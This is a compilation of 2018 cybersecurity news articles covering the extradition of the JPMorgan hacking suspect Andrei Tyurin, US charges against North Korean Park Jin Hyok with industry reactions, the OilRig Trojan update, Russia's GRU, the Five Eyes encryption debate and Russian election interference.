Georgia Extradites Russian Data Theft Suspect to US
10.9.2018 securityweek BigBrothers

A 35-year-old Russian was extradited to the United States from Georgia on Friday to answer criminal charges over the massive theft of customer data from JPMorgan Chase and Dow Jones, officials announced.

Andrei Tyurin is accused of orchestrating major hacking crimes against US financial institutions, brokerage firms and financial news publishers, including the largest theft of customer data from a US financial institution.

US prosecutors say the schemes from 2012 to mid-2015 included the theft of personal information of over 100 million customers of the victim companies.

The scheme compromised data from millions of customers of JPMorgan Chase and other firms, previously identified as the Dow Jones media group and online brokers ETrade and Scottrade.

Tyurin, originally from Moscow, was arrested in Georgia at the request of US authorities, US officials said.

He faces 10 charges on multiple conspiracy counts, as well as wire fraud, aggravated identity theft and four counts of computer hacking. The most serious charges carry a maximum sentence of 30 years in prison.

Three other purported co-conspirators, Israeli citizens Gery Shalon and Ziv Orenstein, and American Joshua Aaron were arrested in 2015 and 2016.

Tyurin will appear before a Manhattan federal court later on Friday, with another scheduled court hearing on September 25, US prosecutors said.

His alleged hacking activities "lay claim to the largest theft of US customer data from a single financial institution in history, accounting for a staggering 80 million-plus victims," said US Attorney Geoffrey Berman.

Russian citizen behind JPMorgan Chase and Dow Jones attacks has been extradited to US
8.9.2018 securityaffairs BigBrothers

Andrei Tyurin, the man that is accused to be the responsible for major cyber attacks against financial institutions, including JPMorgan Chase, was extradited to the United States from Georgia.
The Russian citizen Andrei Tyurin (35) was extradited to the United States from Georgia on Friday, the man charged over the massive theft of customer data from JPMorgan Chase and Dow Jones, officials announced.

The man was arrested in Georgia at the request of US authorities, he faces 10 charges on multiple conspiracy counts, including wire fraud, aggravated identity theft and four counts of computer hacking.

Andrei Tyurin is accused of being the mastermind of the organization that targeted the US financial institution from 2012 to mid-2015.

“US prosecutors say the schemes from 2012 to mid-2015 included the theft of personal information of over 100 million customers of the victim companies.” states the AFP.

Crooks compromised data from millions of customers of financial firms, including JPMorgan Chase, the Dow Jones media group, and ETrade and Scottrade brokers.

His alleged hacking activities “lay claim to the largest theft of US customer data from a single financial institution in history, accounting for a staggering 80 million-plus victims,”

According to the US Attorney Geoffrey Berman, Tyurin and his accomplices’ activities “lay claim to the largest theft of US customer data from a single financial institution in history, accounting for a staggering 80 million-plus victims,”

The other components of the crime gang were already arrested in 2015 and 2016, they are the American Joshua Aaron and Israeli citizens Gery Shalon and Ziv Orenstein.

Tyurin will appear before a federal court later on September 25.

Opsec Mistakes Allowed U.S. to Link North Korean Man to Hacks
8.9.2018 securityweek BigBrothers

A 34-year-old North Korean national has been charged by U.S. authorities over his alleged involvement in the cyberattacks carried out by the Lazarus Group. An affidavit filed by an FBI special agent reveals how investigators linked the man to the notorious threat actor.

Park Jin Hyok has been charged with one count of conspiracy to commit computer fraud and abuse and one count of conspiracy to commit wire fraud. The FBI has added him to its Cyber Most Wanted list and the U.S. Department of Treasury announced sanctions against Park and the North Korean company he worked for.

The criminal complaint, filed on June 8 and made public on Thursday, describes both successful and unsuccessful campaigns of the Lazarus Group, but it focuses on four operations: the 2014 Sony Pictures Entertainment hack, the $81 million cyber heist from the central bank of Bangladesh in 2016, the 2017 WannaCry ransomware attack, and attempts to breach the systems of U.S. defense contractors in 2016 and 2017.

Governments and members of the cybersecurity industry previously linked most of these attacks to North Korea and the Lazarus Group (aka Hidden Cobra) based on shared code and infrastructure. However, the criminal complaint made public on Thursday reveals the apparent operational security (opsec) mistakes that led to investigators accusing Park of being involved in the campaigns.

Park is a North Korean programmer who until 2014, just before the Lazarus attack on Sony, worked in the China-based offices of Chosun Expo Joint Venture, also known as Korea Expo Joint Venture or KEJV. The company, which is said to be a front for the North Korean government, has been linked to the country’s military intelligence and it allegedly supports Pyongyang’s cyber activities.

According to investigators, Park worked at KEJV’s offices in Dalian, Liaoning, China, a province that borders North Korea. A résumé discovered by agents showed that he had been employed as a developer and that he had programming skills in – among many others – Visual C++, the language used to create many of Lazarus’ tools.

One of the personas used by Lazarus to set up its operations was “Kim Hyon Woo” and several links have been found between this moniker and Park’s online activities, including shared access to files, common names, and common IP addresses.

Links between Park Jin Hyok and Lazarus Group

Agents discovered that one of the email accounts used by Park, ttykim1018(at)gmail.com, and one account used by Kim Hyon Woo, tty198410(at)gmail.com, both had the “tty” string in their names.

But that’s not the only connection. One email had been added to the other’s address book and the Kim Hyon Woo address was the only one allowed to access an archive file saved in a remote file storage account associated with Park’s address.

Park’s address was also used to register a video account that shared profile information with a video account and a payment account created by Kim Hyon Woo.

Lazarus’ tty198410 account was used to register a Gmail account named mrkimjin123(at)gmail.com. This address is noteworthy as it incorporates both the Kim and Jin names.

Another email address, which Park apparently used for official KEJV communications, surigaemind(at)hotmail.com, received and sent messages addressed to and signed by a “Mr. Kim Jin” and “Kim Jin.”

Another important piece of evidence linking Park’s KEJV and personal accounts to Lazarus operational accounts registered by the Kim Hyon Woo persona is the discovery of common IP addresses – based in North Korea and elsewhere – that were used to access the accounts.

Investigators also discovered that the Brambul malware, which the U.S. recently attributed to Hidden Cobra, used various collector email accounts to store information stolen from compromised devices. The same North Korean IP address was used to access one of the Brambul collector accounts and KEJV-linked email accounts.

The complaint also reveals that Park is not the only subject of the FBI’s investigation into the Lazarus attacks and he likely was not the only individual with access to the analyzed accounts.

Homeland Security Head: Colorado Tops US in Vote Security
8.9.2018 securityweek BigBrothers

Colorado, whose election systems are ranked among the nation's safest, held a cyber-security and disaster exercise Thursday for dozens of state, county and federal elections officials to reinforce the state's preparedness for, and public confidence in, November's midterm elections.

Participants included Department of Homeland Security cyber experts working with county elections clerks to confront a rapid-fire sequence of scenarios. In a brief appearance, Homeland Security Secretary Kristjen Nielsen praised Colorado as a national leader in safeguarding elections.

On Wednesday, Nielsen called election security one of the nation's highest priorities. She said the biggest threats are coming online from malicious nation-states seeking to disrupt democracy.

The U.S. intelligence community has said Russia had tried to influence the 2016 election to benefit President Donald Trump. Nielsen frequently has said the Russians attempted to sow discord and undermine faith in the democratic process and, over time, developed a preference for then-candidate Trump.

On Thursday, Nielsen reiterated her concerns about potential Russian hacking or interference, particularly of voter databases this year. But she said no attempts have been detected so far that match the scale of the 2016 effort.

"Any attempt to interfere in our elections is a direct attack on our democracy and is unacceptable," Nielsen told participants at a Denver hotel. Turning to Colorado's record, she declared: "We'd love to continue to use you as an example of what other states can adopt."

Among them, she said, her department wants all 50 states to conduct postelection risk-limiting audits, which strictly ensure the accuracy of vote counts, by 2020. It's standard practice in Colorado.

Colorado's Republican Secretary of State, Wayne Williams, said the exercise aimed to increase public confidence that votes are safe.

"So we can tell you that nobody in Russia, nobody in China, nobody anywhere else in the world can change a ballot in Colorado," Williams said.

Colorado was the only one among 21 targeted states to report to Homeland Security — not the other way around — that Russian interests attempted to hack into its systems in 2016, said state elections director Judd Choate.

It's invested in new vote tabulating machines and creates a separate paper trail of each ballot cast. Since 2013, it's required two-factor authentication for elections systems operators to access equipment. The secretary of state's office has more internet technology staff than purely elections-related staff, and it has plans, which Choate wouldn't disclose for security reasons, to guarantee security and privacy in the remote case the state's voter registration database is hacked.

This year, the state also will monitor Facebook, Twitter and Instagram starting well ahead of the election to detect and respond to false rumors about voting procedures, outages, and other voting problems. It also will collect intelligence on efforts to sway voters on social media, Choate said. He noted that Colorado's collaboration with Homeland Security is strong.

Choate warned the dozens of clerks, database experts and others that Thursday's exercise would be tough, involving, among a cascade of other problems, attempts to hack voter rolls, detect possible malware planted in voting systems weeks beforehand, phishing and responding to social media posts claiming systems were hacked or voters turned away. The exercise concerned both the weeks leading up to the election and election day itself.

"Like the worst possible election day and election that you've ever seen in your life. So there's every single disaster that you probably thought couldn't happen, and then about 15 that you wouldn't even thought through," Choate said.

Paul Huntsberger, database chief for Denver County's elections division, worked with colleagues from across the state responding or devising responses to the disaster scenarios: Def Con hackers in Las Vegas, electricity outages, security patches, verifying clearances and background checks for personnel, responding to ransomware attacks in other states.

Throughout, officials masquerading as citizens and news reporters demanded immediate answers to security questions.

"All of this is needed," Huntsberger said during a brief break. "And we're proving that communication, secure communication, is key to making it work."

Industry Reactions to U.S. Charging North Korean Hacker: Feedback Friday
8.9.2018 securityweek BigBrothers

A North Korean national has been charged by U.S. authorities over his alleged involvement in the cyberattacks carried out by the notorious Lazarus Group.

Park Jin Hyok, 34, has been charged with one count of conspiracy to commit computer fraud and abuse and one count of conspiracy to commit wire fraud. The FBI has added him to its Cyber Most Wanted list and the U.S. Department of Treasury announced sanctions against Park and the North Korean company he worked for.

The criminal complaint made public on Thursday focuses on four of the hacker group’s operations: the 2014 Sony Pictures Entertainment hack, the $81 million cyber heist from the central bank of Bangladesh in 2016, the 2017 WannaCry ransomware attack, and attempts to breach the systems of U.S. defense contractors in 2016 and 2017.

Experts comment on U.S. charging Park Jin Hyok with hacking

Investigators have found several links between Park, the Lazarus Group and Chosun Expo Joint Venture, also known as Korea Expo Joint Venture (KEJV), a North Korean government front company allegedly used to support its cyber activities.

Industry professionals have commented on various aspects of the story, including Lazarus Group’s ongoing activities and the impact of the charges brought against Park.

And the feedback begins...

Ed McAndrew, Partner & Co-Chair, Privacy & Data Security Group at Ballard Spahr:

“Why today? Even with the benefit of having served as a federal cybercrime prosecutor for almost 10 years, I’m struggling to understand why the DOJ unsealed this complaint today. There is no imminent activity, law enforcement or otherwise, that supports the unsealing right now. It seems intended only to “name and shame” Hyok and the North Korean Government, for actions that the US Government has already publicly attributed to North Korea.

Why a complaint, instead of a grand jury indictment? The manner of charging Hyok is odd. This is a criminal complaint; not an indictment. Complaints are used to charge people quickly when they have been arrested or are facing imminent arrest. Generally, the DOJ has been using “name and shame” indictments against cybercrime agents of foreign governments. Because Mr. Hyok has not been arrested and is unlikely to ever see the inside of the US courtroom, the use of a complaint here is odd.

I think this indictment will have little tangible impact on Mr. Hyok, unless he is an avid international traveler. He is unlikely to face arrest unless he travels to a country that cooperates with US law enforcement or has an extradition treaty with the United States. It is also unlikely to have little impact on North Korea, which will almost certainly deny the allegations. The US Government has already accused North Korea of being linked to these criminal actions, so charging one individual who will never face prosecution seems to be of limited value, at best.

There’s also a potential downside to US law enforcement in publicizing this level of detail about the methodology behind cyber investigations and the sources and types of evidence used to attribute cybercriminal activity to a particular individual. The affidavit shows how capable our law enforcement agencies are in tracking cyber bread crumbs and connecting digital dots. However, the affidavit almost certainly will be studied by cybercriminals and nation state actors on how to improve their own operational security and avoid detection in the future. In my view, that potential cost outweighs the benefit of disclosure in this case.”

Eric Chien, technical director, Symantec Security Response:

“What’s perhaps most interesting about the DOJ indictment is that law enforcement was able to identify Park Jin Hyok as part of the Lazarus group by obtaining emails from his Hotmail and Gmail accounts. Surprisingly, Park used the same email accounts for the legitimate software development work, as well as hacking activity attributed to Lazarus. Park’s resume and image were discovered in his email, which helped law enforcement attribute the hacking activity back to him specifically.

We’ll likely see Lazarus move away from these free email services, given they’ll have to re-tool their entire infrastructure, including email accounts, passwords, servers, etc. now that they know they’re being watched. Lately, the group’s main focus has been on cryptocurrency – most of the attacks from the past year that we believe are related to Lazarus have targeted crypto-related victims (i.e. ICO providers, cryptocurrency banks, mining pool providers, etc.). It’s unlikely that this indictment will stop the group entirely – judging from their history, such as the Sony breach and WannaCry, they’re brazen and not scared of getting caught.”

Benjamin Read, senior manager, cyber espionage analysis, FireEye:

“The US Department of Justice’s criminal complaint describing a North Korean national’s role in a wide range of intrusion activity is consistent with FireEye’s analysis of both the scope and attribution of this activity, which we link to the group TEMP.Hermit. While we do not have insight into all of the incidents described in the complaint, our analysis concurs with the conclusion that the actors responsible for multiple financially motivated intrusions, the WannaCry ransomware and many of the other incidents are linked by shared development resources. FireEye has observed these malicious operations continuing at a high pace over the last two years and impacting numerous organizations.

FireEye assisted the US Government with analysis of malware provided by the Department of Justice in support of this effort; however, we cannot comment on the specifics of that analysis. Our company assessments are made based only on data we have independently obtained through Mandiant incident response, FireEye devices and other sources.”

Sherrod DeGrippo, director of threat research and detection, Proofpoint:

The Lazarus group is still very active. Most recently we profiled the financially motivated arm of the organization and their work targeting South Korean point-of-sale infrastructure and, separately, cryptocurrency wallets and exchanges. The Lazarus Group also includes both disruption and espionage arms engaged in ongoing efforts worldwide.

Mukul Kumar, Chief Information Security Officer and VP of Cyber Practice, Cavirin:

“Though the Sony Breach hasn’t been in the news for a while, the charges prove that we’re getting better at identifying the ultimate sources of breaches. This of course also applies to non state-sponsored hackers, who may have believed that they could not be tracked.”

Bill Conner, CEO, SonicWall:

“The Sony breach and WannaCry ransomware attacks are milestones for those in the IT industry, as they mark a day we’ll never forget and a distinct moment when the cyber war was brought to the attention of those who were unsuspecting to it. Law enforcement agencies and government officials around the world are challenged by the internet’s invisible boarders and its nameless perpetrators when it comes to pursuing or charging cyber criminals. While almost four years have passed since the communications giant sent notifications of its attacks, the U.S. Justice Department’s actions are commendable and should serve as a reminder for consumers and organizations alike to remain vigilant.

In today’s connected world, it is irresponsible to operate online without strict security standards. Total end-to-end security is key, including a layered approach to security across wired, wireless, mobile and cloud networks, as well as the securing IoT devices to prevent tampering and unauthorized access.”

David Maxwell, Senior Fellow, FDD:

“Although there is a significant time lapse between the hack and this indictment, it shows that the U.S. is tracking the North Korea threat, and that despite the current nuclear diplomacy the U.S. will pursue cyber operatives and hacker/criminals who wish to do the U.S. and the U.S. economy harm.

The U.S. has to address cyber threats, though this is just one very small step toward improving cyber defenses. The U.S. has to make it known it will hunt down hackers who do us harm, whether they are individuals or working for state actors such as North Korea.

It is also important the American public knows its government is going after these threats and will relentlessly pursue the perpetrators of cyber attacks.

It is especially important the U.S. goes after North Korea's cyber capabilities because Pyongyang is relying on illicit activities for funding and, ultimately, to support regime survival. Cyber provides the regime with a broad range of capabilities: from stealing funds, to espionage, to influencing social media information, to hacking enemies, and to attacking infrastructure. In many ways, cyber is much more practical and valuable than nuclear weapons.

This supports continued maximum pressure on North Korea, as cyber activities help the regime generate revenue through other means that have been stopped because of sanctions.”

Dmitri Alperovitch, CTO and co-founder of CrowdStrike:

“DPRK cyber adversaries represent some of the most active and disruptive threat groups today. Their tradecraft continues to grow in sophistication, leveraging cyber capabilities for conducting data exploitation, data destruction, cyber espionage and financially-motivated criminal activity — often costing organizations millions of dollars in damages. In the past year, we’ve witnessed DPRK commit to expansive cyber operations in support of their ability to service regime priorities and effectuate national interest. These crimes have impacted the global financial system and nearly every sector of the economy.

One of the most important steps taken towards achieving effective cyber deterrence is the attribution of these attacks and holding the perpetrators accountable, as we witnessed today by the announcement of the US Department of Justice.”

Iranian Hackers Improve Recently Used Cyber Weapon
6.9.2018 securityweek BigBrothers

The Iran-linked cyberespionage group OilRig was recently observed using a variant of the OopsIE Trojan that was updated with new evasion capabilities, Palo Alto Networks reports.

The group has been persistently targeting government entities in the Middle East with previously identified tools and tactics, including the OopsIE Trojan that was first identified in February 2018. Unlike previously observed samples, the new iteration packs anti-analysis and anti-virtual machine capabilities, which allows it to further evade detection.

The attacks involving this Trojan variant were detected in July, as part of a campaign that also delivered the QUADAGENT backdoor. However, each malicious program was targeting a different organization.

As part of that wave of attacks, the hackers were using compromised email accounts at a government organization in the Middle East to send spear phishing emails delivering the OopsIE Trojan. The attacks targeted a government agency within the same nation state, Palo Alto Networks’ researchers found.

The email was sent to the email address of a user group that had published documents regarding business continuity management on the Internet. The attackers used lures specifically crafted for this assault.

The OopsIE Trojan begins execution by performing multiple anti-virtualization and sandbox checks. The malware would check CPU fan information, temperature, mouse pointer, hard disk, motherboard, time zone, and human interaction, while also looking for DLLs associated with Sandboxie, VBox, and VMware.

While some of these techniques have been observed in other malware before, OopsIE appears to be the first to check the CPU fan. The CPU temperature check was previously seen being used by GravityRAT.

The time zone check is also of interest, as the Trojan would only execute if it finds strings for Iran, Arab, Arabia and Middle East. These point to five time zones that encompass 10 countries, showing that the malware is highly targeted.

The updated Trojan variant packs most of the functionality previously associated with the threat, but also includes obfuscation, in addition to requiring the user to interact with an error dialog box (the last in the previously mentioned series of checks).

Next, the malware sleeps for two seconds, then moves itself to the App Data folder and creates a scheduled task to run a VBScript that ensures persistence. The process attempts to run the Trojan every three minutes.

The malware then starts communication with the command and control (C&C) server (it uses the www.windowspatch[.]com domain as C&C).

The malware includes support for various commands that it receives from the server. It can run the command, write the output to a file and send it to the server; download a file to the system; read a specified file and upload its contents, and uninstall itself.

“Within the time frame we have been tracking the OilRig group, they have repeatedly shown a willingness to add less commonly found functionality to their tools, such as their heavy use of DNS tunneling in their backdoors or adding authentication to their webshells. This attack is no different, now adding anti-analysis capabilities into their tools. This adversary is highly resourceful and continues to adapt over time,” Palo Alto Networks concludes.

What's GRU? A Look at Russia's Shadowy Military Spies
6.9.2018 securityweek BigBrothers

MOSCOW (AP) — GRU isn't as well-known a baleful acronym as KGB or FSB. But Russia's military intelligence service is attracting increasing attention as allegations mount of devious and deadly operations on and off the field of battle.

The latest charge came Wednesday, when Britain identified two suspects in this year's nerve-agent poisonings as GRU agents.

An overview of the GRU:


Formally named the Main Directorate of the General Staff of the Armed Forces, the agency is almost universally referred to by its former acronym GRU.

It is the most shadowy of Russia's secret services. When its previous director Igor Sergun died in 2016, the Kremlin announcement was so terse that it gave neither the date, cause or place of death.

The agency has an apparently broad mandate. According to the Defense Ministry website, it is tasked not only with "ensuring conditions conducive to the successful implementation of the Russian Federation's defense and security policy" but with providing officials intelligence " that they need to make decisions in the political, economic, defense, scientific, technical and environmental areas."


Britain claims that two GRU agents carried out this spring's attack with the nerve agent Novichok on Sergei Skripal, a former GRU officer who became a British double agent, and his daughter. Both survived the poisoning in the city of Salisbury, but three months later two area residents were sickened by the same nerve agent, one of them fatally — it is believed they found the discarded bottle that had carried the Skripals' poison.

This week's claim came less than two months after the U.S. indicted 12 alleged GRU agents for hacking into the Hillary Clinton presidential campaign and the Democratic Party and releasing tens of thousands of private communications, part of a sweeping conspiracy by the Kremlin to meddle in the 2016 U.S. election.

Also this year, the investigative group Bellingcat reported that a GRU officer was in charge of operations in eastern Ukraine, where Russia-backed separatists were fighting Ukrainian forces, in July 2014 when a Malaysian passenger airliner was shot down, killing all 298 people aboard. International investigators say the plane was shot down by a mobile missile launcher brought in from Russia. The GRU officer named by Bellingcat reportedly was responsible for weapons transfers.

Russia's RBC news service reported this year that the GRU oversees Russian mercenaries in Syria, fighting there as a so-called shadow army.

Russian authorities generally deny allegations against the GRU and refuse to discuss its activities. They said they didn't recognize the suspects Britain named Wednesday in the Salisbury poisoning.


The GRU is one arm of Russia's extensive security and intelligence apparatus, which also includes the Foreign Intelligence Service, known as the SVR, and the Federal Security Service, or FSB, which conducts domestic intelligence and counterintelligence. The SVR and FSB were spun off from the KGB after the collapse of the Soviet Union. A former KGB agent, Vladimir Putin ran the FSB before ascending to the presidency.

And as president, Putin names the top brass in the GRU. Of all the agencies, the FSB looms largest in Russians' minds because it hunts domestic threats. The GRU, created under Soviet founder Vladimir Lenin, has a more ruthless reputation, but focuses its energies on foreign threats.

The agencies' operations appear to both compete and cooperate.

Pavel Felgenhauer, an independent Moscow-based military analyst, told The Associated Press that if "the SVR runs into military intelligence, they have to share it with the GRU; that means they try not to run into military intelligence and tell their agents not to report anything military even if they know it. The other way around, military or GRU assets are asked never to report anything political."

But in the case of the alleged U.S. election-related hacking, he said, "I believe that was an inter-service operation, because it's not military but they gained some kind of hacking access and then they shared it with the FSB and the SVR."

'Five Eyes' Agencies Demand Reignites Encryption Debate
5.9.2018 securityweek  BigBrothers

Privacy and human rights organizations expressed concern Tuesday after a coalition of intelligence agencies renewed a call for technology companies to allow so-called "backdoor" access to encrypted content and devices.

The reaction came following a weekend statement from the "Five Eyes" intelligence agencies calling on "industry partners" to provide a way for law enforcement to access encrypted content that may not be available even with a search warrant.

The call by the agencies from the United States, Britain, Canada, Australia and New Zealand threatens to reignite a long-simmering debate on encryption.

"Many of the same means of encryption that are being used to protect personal, commercial and government information are also being used by criminals, including child sex offenders, terrorists and organized crime groups to frustrate investigations and avoid detection and prosecution," said the statement from the five countries issued by Australia's Department of Home Affairs.

Without voluntary cooperation, the agencies said, "we may pursue technological, enforcement, legislative or other measures to achieve lawful access solutions."

While some law enforcement agencies contend that encryption is being used to shield criminal activity, tech firms and privacy activists argue that any weakening of encryption would harm security for all users.

"The risk is that these countries will compel providers to build a backdoor that not only governments will exploit but hackers, criminals and other bad guys will use as well," said Greg Nojeim of the Washington-based Center for Democracy & Technology.

"It would weaken cybersecurity at the same time governments are preaching that cybersecurity needs to be addressed."

Marc Rotenberg, president of the Electronic Privacy Information Center, called the latest effort "a short-sighted and counterproductive proposal" and added that "it has become clear that encryption is vital for both privacy and public safety."

Similar concerns were voiced by Amnesty International, which said in a tweet, "This won't make us safer -- it will just weaken security for everyone."

Debate on 'going dark'

Encryption has been a hot-button issue in the United States for years, and came to a head in 2016 when Apple challenged the FBI's request to create software that would enable investigators to access an iPhone used by an attacker in a 2015 mass shooting in San Bernardino, California.

The US government eventually dropped its demand after finding another means to access the device, but a number of law enforcement officials have complained that they are "going dark" with the use of encrypted apps and devices that cannot be accessed by traditional wiretaps.

Nojeim said the claim of "going dark" is vastly exaggerated.

"There has never been more electronic information available to assist criminal and intelligence investigations," he said.

"We leave a digital footprint with virtually everything we do online and most of those footprints can be collected without the hindrance of encryption."

But James Lewis of the Center for Strategic and International Studies, who supports better law enforcement access, said tech firms may face more pressure than in the past.

"It's part of the bigger public move to rein in the tech companies and make them more socially responsible," Lewis said. "The old laissez-faire arguments are losing ground."

Will Russian Hackers Affect This Year's US Election?
4.9.2018 securityweek  BigBrothers

Nearly a year after Russian government hackers meddled in the 2016 U.S. election, researchers at cybersecurity firm Trend Micro zeroed in on a new sign of trouble: a group of suspect websites.

The sites mimicked a portal used by U.S. senators and their staffs, with easy-to-miss discrepancies. Emails to Senate users urged them to reset their passwords — an apparent attempt to steal them.

Once again, hackers on the outside of the American political system were probing for a way in.

"Their attack methods continue to take advantage of human nature and when you get into an election cycle the targets are very public," said Mark Nunnikhoven, vice president of cloud research at Trend Micro.

Now the U.S. has entered a new election cycle. And the attempt to infiltrate the Senate network, linked to hackers aligned with Russia and brought to public attention in July, is a reminder of the risks, and the difficulty of assessing them.

Newly reported attempts at infiltration and social media manipulation — which Moscow officially denies — point to Russia's continued interest in meddling in U.S. politics. There is no clear evidence, experts said, of efforts by the Kremlin specifically designed to disrupt elections in November. But it wouldn't take much to cause turmoil.

"It's not a question of whether somebody is going to try to breach the system, to manipulate the system, to influence the system," said Robby Mook, who managed Hillary Clinton's presidential campaign and co-directs a Harvard University project to protect democracy from cyberattacks, in an interview earlier this year. "The question is: Are we prepared for it?"

Online targeting of the U.S. political system has come on three fronts — efforts to get inside political campaigns and institutions and expose damaging information; probes of electoral systems, potentially to alter voter data and results; and fake ads and accounts on social media used to spread disinformation and fan divisions among Americans.

In recent weeks, Microsoft reported that it had disabled six Russian-launched websites masquerading as U.S. think tanks and Senate sites. Facebook and the security firm FireEye revealed influence campaigns, originating in Iran and Russia, that led the social network to remove 652 impostor accounts, some targeted at Americans. The office of Republican Sen. Pat Toomey of Pennsylvania said hackers tied to a "nation-state" had sent phishing emails to old campaign email accounts.

U.S. officials said they have not detected any attempts to corrupt election systems or leak information rivaling Kremlin hacking before President Donald Trump's surprise 2016 victory.

Still, "we fully realize that we are just one click away of the keyboard from a similar situation repeating itself," Dan Coats, the director of national intelligence, said in July.

Michael McFaul, the architect of the Obama administration's Russia policy, has said he believes Russian President Vladimir Putin perceives little benefit in a major disruption effort this year, preferring to keep his powder dry for the 2020 presidential contest.

But even if the upcoming elections escape disruption, that hardly means the U.S. is in the clear.

Trump's decision in May to eliminate the post of White House cybersecurity coordinator confirmed his lack of interest in countering Russian meddling, critics say. Congress has not delivered any legislation to combat election interference or disinformation. Last week, a review of the bipartisan "Secure Elections Act" was canceled after Republican leaders registered objections, congressional staffers said.

The risks extend beyond the midterms.

"The biggest question is going to be how are you going to make sure that people actually trust the results, because democracy relies on credibility," said Ben Nimmo, a researcher at the Atlantic Council. "It's not over after November."

Experts said it is too late to safeguard U.S. voting systems and campaigns this election cycle. But with two months to go, there is time enough to take stock of the Russian-sponsored interference that has come to light so far — and to assess the risks of what we don't know.

In mid-2016, hackers found a way into the voter registration database at the Illinois State Board of Elections and spent three weeks poking around. After the breach was discovered, officials said the infiltrators had downloaded the records of up to 90,000 voters.

It's not clear that anything nefarious was done with those records. But when special counsel Robert Mueller charged a dozen Russian intelligence agents with hacking this July, the indictment clarified the potential for damage. The hackers had, in fact, stolen information on 500,000 voters, including dates of birth and partial Social Security numbers.

"The internet allows foreign adversaries to attack Americans in new and unexpected ways," Deputy Attorney General Rod Rosenstein said, in announcing the indictments.

The Illinois hack is the most notable case of foreign tampering with U.S. election systems to come to light. There has been no evidence of efforts to change voter information or tamper with voting machines, though experts caution hackers might have planted unseen malware in far-flung election systems that could be triggered later.

Potential problems are not limited to Illinois.

A week before the 2016 general election, Russian intelligence agents sent spear-phishing emails to 122 local elections officials who were customers of VR Systems, a Tallahassee, Florida-based election software vendor.

In addition to Illinois, at least 20 other state systems were probed by the same Russian military unit that targeted VR's customers, federal officials said.

"My unofficial opinion is that we're kind of fooling ourselves if we don't think that they tried to at least make a pass at all 50 states," said Christopher Krebs, the undersecretary for critical infrastructure at DHS.

In June 2017, the federal Election Assistance Commission informed dozens of local voting officials that hackers had attempted to penetrate the systems of a voting system manufacturer, presumed by many to be VR.

"Attempts have been made to obtain voting equipment, security information and in general to probe for vulnerabilities," the EAC wrote officials. Despite those concerns, federal officials have moved slowly to share intelligence with officials who supervise elections. As of mid-August, 92 state officials had been given clearances.

Much of the machinery used to collect and tabulate votes is antiquated, built by a handful of unregulated and secretive vendors, with outdated software that makes them highly vulnerable to attacks, researchers said.

"If someone was able to compromise even a handful of voting machines I think that would be sufficient to cause people to not trust the system," said Sherri Ramsay, a former National Security Agency senior executive.

This spring, a website used by Knox County, Tennessee, officials to display election-night results was knocked offline by an unidentified perpetrator. While the attack was little noticed, it would not be hard to replicate, experts said. Combined with a social media campaign alleging vote tampering, such mischief could cast a shadow over an election, they said.

Election officials have been sandboxing such scenarios for weeks as they prepare for November's balloting.

There's already a Russian playbook for thwarting an election: In Ukraine in 2014, the presidential contest was disrupted by a virus that scrambled election-management software, followed by a media disinformation campaign claiming a pro-Moscow candidate had won.

Democratic Sen. Claire McCaskill of Missouri is plenty busy this fall as she seeks re-election in a state that voted overwhelmingly for Trump. So when an attempt by Russian hackers to infiltrate her campaign came to light in July, she acknowledged it only briefly.

"While this attack was not successful, it is outrageous that they think they can get away with this," McCaskill said. "I will not be intimidated. I've said it before and I will say it again, Putin is a thug and a bully."

The failed hack, which included an attempt to steal the password of at least one McCaskill staffer through a fake Senate login website identified by Microsoft, is the most notable instance of attempted campaign meddling by Russia made public this year.

Microsoft executives said recently that the company had detected attempts by Russia's GRU military intelligence agency to hack two senators. One was presumably McCaskill, but the others have not been identified.

The group behind that attempt, Fancy Bear, is the same one indicted July 13 and identified by Microsoft as the creator of fake websites targeting the Hudson Institute and the International Republican Institute, frequent critics of the Kremlin. Since the summer of 2017, Fancy Bear has aggressively targeted political groups, universities, law enforcement agencies and anti-corruption nonprofits in the U.S. and elsewhere, according to TrendMicro.

"Russian hackers appear to be broadening their target set, but I think tying it to the midterm elections is pure speculation at this point," said Michael Connell , an analyst at the federally funded Center for Naval Analyses in Arlington, Virginia.

There have been other recent reports of U.S. congressional campaign websites targeted by hackers, but that doesn't mean Russian agents are to blame. Experts said most are likely run-of-the-mill criminal cyberattacks seeking financial gain rather than political change.

But Eric Rosenbach, who served as assistant secretary of defense for global security during President Barack Obama's administration and is now at Harvard, said the limited examples of Russian intrusion that have come to light may be only a tip to more significant, still hidden schemes.

"There probably have already been compromises of important campaigns in places where it could sway the outcome or undermine trust in the election," Rosenbach said. "We might not see that until the very last moment."

The risk is magnified by poor efforts to protect many campaign sites, said Josh Franklin, until last month the lead National Institutes of Standards and Technology researcher on voting systems security.

Nearly a third of the 527 House of Representatives campaigns examined by Franklin and fellow researchers had such poor cybersecurity they were graded worse than failing.

"We couldn't go any further with our scan," he said. "We were told that we would be in danger of being sued by the candidate campaigns."

By the time a group called "ReSisters" began organizing a rally against white nationalism for Aug. 10, it had spent more than a year sharing left-wing posts about feminism, immigration and other hot-button topics.

"Confront + Resist Fascism," the group urged on a Facebook event page for its "No Unite the Right 2" protest in Washington, D.C. Like-minded Facebook users posted information about transportation, materials and location so those interested could attend.

In late July, Facebook short-circuited the effort, shutting down the pages and accounts of ReSisters and 31 others. Despite appearing to speak for Americans, the company said, the accounts were planted by unidentified outsiders to fuel divisions among U.S. voters. Researchers at the Atlantic Council who examined the accounts said they acted in ways echoing Russian troll operations before the 2016 election, pointing to English on the pages speckled with grammatical mistakes typical of native Russian speakers.

"We face determined, well-funded adversaries who will never give up and are constantly changing tactics," Facebook said. The outing of the sites is a reminder as November approaches that Russians and other foreign actors continue to use social media to try to influence U.S. politics.

Since the 2016 election, officials and researchers have learned much more about such infiltration. The May release by House Democrats of more than 3,500 ads placed on Facebook by Russian agents from 2015 to 2017 revealed a deliberate campaign to inflame racial divisions in the U.S. Facebook and other tech companies say they are working hard to combat such behavior. But it is not nearly enough, experts said.

The companies must be forced to act faster against Russian and other disinformation campaigns and be made more accountable , said Dipayan Ghosh, a fellow at Harvard's Kennedy School of Government who has worked at both the White House and Facebook on tech policy including social media manipulation.

Ghosh said quantifying Russian disinformation on social media is difficult because they "are operating behind a commercial veil" of for-profit networks that are not subject to public scrutiny.

"The industry is currently accountable to nobody," Ghosh said.

After Facebook was criticized for allowing a data-mining firm to collect information about millions of its users, CEO Mark Zuckerberg said he was open to regulation. But the "Honest Ads Act," which would require online political ads to be identified as they are in traditional media, has stalled in Congress.

